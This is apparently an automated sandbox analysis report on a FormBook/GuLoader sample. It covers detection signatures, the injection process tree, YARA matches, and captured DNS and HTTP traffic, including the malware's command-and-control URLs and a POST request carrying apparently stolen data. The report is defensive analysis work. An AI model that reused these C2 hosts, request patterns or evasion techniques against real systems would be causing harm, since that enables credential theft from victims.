
Analysis Report sample.exe

Overview

General Information

Sample Name:sample.exe
MD5:178d06da82a097ab37a7423726fb2819
SHA1:31540af8d936241bd20d41599e17c80090906e2d
SHA256:59b75c1a0a646cabb9c69e981dc95985d9feb3ee1e3f7c3c0ace8165037ed006

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Potential malicious icon found
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to resolve many domain names, but no domain seems valid
Tries to steal Mail credentials (via file access)
Adds / modifies Windows certificates
Antivirus or Machine Learning detection for unpacked file
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7
  • sample.exe (PID: 3772 cmdline: 'C:\Users\user\Desktop\sample.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
    • sample.exe (PID: 3820 cmdline: 'C:\Users\user\Desktop\sample.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
      • Dynamitbom9.exe (PID: 3848 cmdline: 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
        • Dynamitbom9.exe (PID: 3860 cmdline: 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
          • explorer.exe (PID: 1216 cmdline: MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
            • wscript.exe (PID: 3992 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.vbs' MD5: 979D74799EA6C8B8167869A68DF5204A)
              • Dynamitbom9.exe (PID: 4016 cmdline: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe MD5: 178D06DA82A097AB37A7423726FB2819)
                • Dynamitbom9.exe (PID: 4028 cmdline: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe MD5: 178D06DA82A097AB37A7423726FB2819)
            • mstsc.exe (PID: 1508 cmdline: C:\Windows\System32\mstsc.exe MD5: 4676AAA9DDF52A50C829FEDB4EA81E54)
              • cmd.exe (PID: 2168 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
              • firefox.exe (PID: 2460 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: 594F91C5985AC402ECD2D7F1376AFFFD)
            • mstsc.exe (PID: 2164 cmdline: C:\Windows\System32\mstsc.exe MD5: 4676AAA9DDF52A50C829FEDB4EA81E54)
            • igfxjjoh.exe (PID: 2564 cmdline: C:\Program Files\Av0hhbt\igfxjjoh.exe MD5: 178D06DA82A097AB37A7423726FB2819)
              • igfxjjoh.exe (PID: 2524 cmdline: C:\Program Files\Av0hhbt\igfxjjoh.exe MD5: 178D06DA82A097AB37A7423726FB2819)
                • Dynamitbom9.exe (PID: 2608 cmdline: 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
                  • Dynamitbom9.exe (PID: 2276 cmdline: 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
            • igfxjjoh.exe (PID: 2560 cmdline: 'C:\Program Files\Av0hhbt\igfxjjoh.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
              • igfxjjoh.exe (PID: 1548 cmdline: 'C:\Program Files\Av0hhbt\igfxjjoh.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
            • raserver.exe (PID: 2600 cmdline: C:\Windows\System32\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000B.00000002.2469359795.01A3D000.00000004.00000001.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
  • 0x1708:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000003.00000000.681534832.0040D000.00000020.00020000.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
  • 0x1ee0:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000018.00000002.1740071374.00060000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000018.00000002.1740071374.00060000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x157b9:$sqlite3step: 68 34 1C 7B E1
  • 0x158cc:$sqlite3step: 68 34 1C 7B E1
  • 0x157e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1590d:$sqlite3text: 68 38 2A 90 C5
  • 0x157fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15923:$sqlite3blob: 68 53 D8 7F 8C
00000018.00000002.1740071374.00060000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(83 entries in total)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: sample.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Program Files\Av0hhbt\igfxjjoh.exe | Avira: detection malicious, Label: HEUR/AGEN.1043318
Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Avira: detection malicious, Label: HEUR/AGEN.1043318
Multi AV Scanner detection for dropped file
Source: C:\Program Files\Av0hhbt\igfxjjoh.exe | Virustotal: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\Av0hhbt\igfxjjoh.exe | Virustotal: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Virustotal: Detection: 44%
Multi AV Scanner detection for submitted file
Source: sample.exe | Virustotal: Detection: 44%
Yara detected FormBook
Source: Yara match | File source: 00000018.00000002.1740071374.00060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2473272217.030F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.812505176.00030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.839828819.00030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.1736537733.00030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.843123358.00180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.813297733.006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2467957823.01300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.1740999047.1E280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2473955848.03C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.1593989873.00060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.843680618.1DA20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2468014555.01330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2467062900.00180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.763632814.0A000000.00000040.00000001.sdmp, type: MEMORY
Source: 2.2.sample.exe.1350000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 21.2.igfxjjoh.exe.1530000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 18.2.igfxjjoh.exe.15c0000.2.unpack | Avira: Label: TR/Dropper.Gen

Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4x nop then lea edx, dword ptr [ebp-1Ch] | 4_2_1EC71E4C
Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 4x nop then lea edx, dword ptr [ebp-1Ch] | 9_2_1EB41E4C
Source: C:\Windows\System32\mstsc.exe | Code function: 4x nop then jmp 0166B9BEh | 11_2_015D45E6
Source: C:\Windows\System32\mstsc.exe | Code function: 4x nop then jmp 015E7098h | 11_2_015E7072

Networking:

Tries to resolve many domain names, but no domain seems valid
Source: unknown | DNS traffic detected: query: www.wangrunjs.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.fekrforoush.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.3-333i000000x01-virus.net replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.onenationrescue.info replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.hothotshortie.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.myaccesscomm.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.funuldigital.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.talleralbamotors.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.bolbjergs.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.hot-items-on-the-web.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.weifangruanjiankaifa.com replaycode: Name error (3)
Source: global traffic | HTTP traffic detected: GET /la8/?tB=dTsJqfyDncR79ChDcZ7dTVXKjVLU/POLqVYwrsJvBb27JhZOGg1DiQs5qfVZyDNRUwezEA==&8pBXn=3f3DUfw HTTP/1.1 Host: www.shxzauto.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /la8/?tB=BCnuU+BrzKZHMhRMQrUb+8TCvCHQh5V6jbGtAJ4/7cjQ+AxSy2ru3Enl57uSRAreLq2AIw==&8pBXn=3f3DUfw HTTP/1.1 Host: www.mansiobok3.info Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /la8/?tB=6jXfCnlmBUyhP3MDei5dHW3QfFih/L7qzkUFbpiiQQ7cTGHkRqoPnobMGZmVRVyeMjEViA==&8pBXn=3f3DUfw HTTP/1.1 Host: www.lowbrowpizzaandbeer.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 198.49.23.145 198.49.23.145
Source: Joe Sandbox View | ASN Name: unknown unknown
Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
    Source: unknownHTTP traffic detected: POST /la8/ HTTP/1.1Host: www.mansiobok3.infoConnection: closeContent-Length: 205480Cache-Control: no-cacheOrigin: http://www.mansiobok3.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mansiobok3.info/la8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 42 3d 4a 67 72 55 4b 5a 68 72 34 4f 35 52 4b 68 56 34 66 4d 31 76 69 72 50 39 68 77 4c 6c 68 6f 78 39 28 64 53 37 42 70 51 42 30 39 54 4d 36 6a 52 33 31 30 4c 6e 73 57 53 55 71 64 44 33 4e 58 37 4e 4b 4b 62 69 64 73 6e 62 45 6c 42 56 4a 68 4d 50 4e 56 51 32 38 46 56 65 61 4e 4c 4e 58 57 41 41 48 42 5a 6f 36 4a 30 4b 6b 72 45 58 39 44 6d 57 61 75 76 4c 42 6d 37 58 65 79 4b 69 67 4f 6f 69 57 69 75 6a 69 38 42 6e 74 56 47 68 34 7a 78 31 4a 39 45 78 35 76 66 4e 37 59 28 42 32 49 47 5a 66 45 39 5f 28 6e 6b 44 33 66 57 61 62 32 44 38 70 6d 35 66 7e 35 41 4e 38 53 66 73 53 43 32 44 78 50 65 79 77 55 49 50 47 67 4e 49 72 6b 56 4d 4c 39 7e 34 48 69 53 32 57 67 61 33 4e 79 35 62 48 66 75 68 52 76 4c 62 31 57 62 70 49 64 6f 67 67 71 6f 76 57 67 44 56 31 6b 59 57 76 6a 57 68 79 75 73 6f 78 4b 69 52 52 4d 70 74 47 32 63 65 6a 61 65 54 64 5a 77 2d 53 69 4e 4c 78 67 4d 70 55 77 63 48 39 52 61 34 4e 39 6c 53 42 36 48 79 52 30 45 48 78 49 52 43 4b 5f 44 61 4b 58 76 70 31 7a 6d 4b 50 31 4a 57 5a 68 41 59 4b 78 34 34 43 44 44 38 73 4a 4d 77 54 4d 65 48 50 55 73 2d 6b 6c 59 76 53 57 50 74 71 45 52 76 68 45 44 39 6d 4e 41 65 73 61 71 44 33 69 7e 76 65 35 4f 6e 39 47 6f 38 44 58 32 46 52 4e 6b 74 7a 46 70 54 58 4e 57 79 58 4c 6a 50 51 2d 42 35 4f 6a 32 77 4a 77 64 39 73 5a 46 6b 49 4c 4a 4f 52 79 56 61 4d 70 5a 44 63 73 46 41 48 37 68 6f 65 78 37 68 78 35 61 71 55 4a 57 46 56 66 78 50 28 37 30 54 64 43 43 42 68 31 49 56 6a 4a 33 33 74 6b 6a 76 39 6f 39 76 46 51 39 67 49 4c 70 70 69 68 54 55 75 48 35 77 56 63 36 6b 6e 38 4d 47 77 42 44 4a 32 6a 69 6c 77 66 75 38 53 33 45 63 49 
39 28 63 4f 59 78 42 70 72 47 7a 38 70 57 69 59 77 62 48 7a 44 48 62 64 46 56 7a 69 72 61 46 68 73 6a 71 33 46 77 63 6e 73 35 32 34 33 4c 74 48 49 67 56 7a 44 33 6b 55 76 35 43 57 2d 73 68 50 48 53 64 35 65 4c 55 4d 43 53 57 7e 4b 77 31 79 65 33 36 28 39 57 43 4b 41 67 6e 78 75 4e 5a 6e 68 45 46 6d 78 33 4c 67 7a 4d 34 55 52 45 4b 42 36 4e 33 79 38 77 49 64 6c 62 4a 5a 31 6d 31 5a 42 76 31 33 4d 57 66 41 34 6a 53 4a 62 6b 39 47 5f 70 34 58 4f 6d 35 6a 63 6a 32 78 44 67 53 59 5f 30 50 4c 49 69 52 31 6a 52 68 59 4a 32 36 78 4a 35 31 32 37 31 71 50 64 62 69 55 4a 54 36 62 75 4e 6b 68 36 4c 74 49 71 50 61 4f 4d 52 31 28 57 56 4b 77 79 61 6f 4e 4d 4e 49 65 79 35 77 51 75 50 48 38 45 7a 7a 46 48 47 53 4e 78 6d 58 65 66 47 30 33 66 77 42 75 2d 54 5a 56 68 78 77 6c 79 48 45 64 4b 4d 71 46 34 76 74 64 7a 57 5a 4f 4f 68 78 72 64 4d 39 70 39 7e 4e 6d 52 4b 54 64 30 57 48 5a 49 79 58 35 43 68 2d 32 53 75 41 6c 4a 6c 55 6b 48 31 37 58 6d 48 7a 63 70 49 35 42 35 56 5f 47 2d 38 6c 37 72 79 5a 73 5f 53 76 4a 39 65 78 35
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jun 2020 07:56:10 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 327Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6c 61 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /la8/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: Dynamitbom9.exe, 00000004.00000002.814167671.00759000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmp | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp | String found in binary or memory: http://crl.use
Source: Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp | String found in binary or memory: http://crl3.dig
Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: Dynamitbom9.exe, 00000004.00000002.814167671.00759000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1740725585.1DAD0000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0B
Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: Dynamitbom9.exe, 00000004.00000002.814167671.00759000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1740725585.1DAD0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0N
Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: Dynamitbom9.exe, 00000004.00000002.814139088.00743000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.840235487.002DD000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1740725585.1DAD0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.thawte.com0
Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmp | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmp | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmp | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: explorer.exe, 00000006.00000000.737373238.03A10000.00000008.00000001.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.711537459.01ED0000.00000008.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.3-333i000000x01-virus.net
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.3-333i000000x01-virus.net/la8/
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.3-333i000000x01-virus.net/la8/www.onenationrescue.info
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.3-333i000000x01-virus.netReferer:
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.bolbjergs.com
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.bolbjergs.com/la8/
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.bolbjergs.com/la8/www.myaccesscomm.com
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.bolbjergs.comReferer:
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.ciscoaslabs.com
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.ciscoaslabs.com/la8/
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.ciscoaslabs.com/la8/www.shxzauto.com
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.ciscoaslabs.comReferer:
Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.fekrforoush.com
